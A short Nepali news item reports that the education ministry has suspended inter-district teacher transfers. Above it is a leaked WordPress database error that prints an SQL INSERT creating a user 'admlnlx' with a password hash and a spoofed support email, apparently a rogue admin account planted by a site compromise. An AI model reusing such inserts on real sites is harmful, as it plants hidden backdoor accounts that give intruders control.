WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bn5PsMxRs9dqQv5krNwTCLJfizCkHS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:50:27', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १५ चैत्र, काठमाण्डौ । शिक्षा, विज्ञान तथा प्रविधि मन्त्रालयले अर्को निर्णय नभएसम्मका लागि शिक्षकहरुको जिल्लान्तर सरुवा बन्द गरेको छ ।
आन्तरिक स्थायीको नतिजा प्रकाशन भइरहको र दरबन्दी मिलानको समेत काम बाँकी भएकाले तत्काललाई सुविधा लिएर शिक्षक निस्किदा तथा अन्य कारणले खाली हुने दरबन्दीमा जिल्लान्तर सरुवा रोकेको शिक्षा, विज्ञान तथा प्रविधि मन्त्रालयले जनाएको छ ।